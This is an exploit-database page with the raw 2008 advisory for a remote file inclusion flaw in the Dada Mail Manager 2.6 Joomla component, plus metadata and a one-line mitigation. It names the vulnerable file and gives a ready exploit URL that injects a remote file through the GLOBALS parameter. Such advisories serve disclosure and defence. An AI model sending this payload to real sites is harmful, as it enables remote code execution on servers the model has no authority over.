header-logo
Suggest Exploit
vendor:
Dada Mail Manager
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Dada Mail Manager
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlander.net:dadamail_manager:2.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability

A remote file inclusion vulnerability exists in com_dadamail version 2.6. The vulnerable file is administrator/components/com_dadamail/config.dadamail.php, which includes the file default.php from the same directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file from a remote host.

Mitigation:

Ensure that the application is not vulnerable to remote file inclusion attacks by validating user input and sanitizing the input before using it in file operations.
Source

Exploit-DB raw data:

======================================================================================================================================


  [o] Dada Mail Manager Component 2.6 Remote File Inclusion Vulnerability

       Software : com_dadamail version 2.6
       Vendor   : http://joomlander.net
       Download : http://joomlacode.org/gf/project/dadamailmanager/frs
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


======================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_dadamail/config.dadamail.php

        require_once($GLOBALS['mosConfig_absolute_path'] . '/administrator/components/com_dadamail/language/default.php');



  [o] Exploit

       http://localhost/[path]/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]


======================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11  martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

        
======================================================================================================================================

# milw0rm.com [2008-11-05]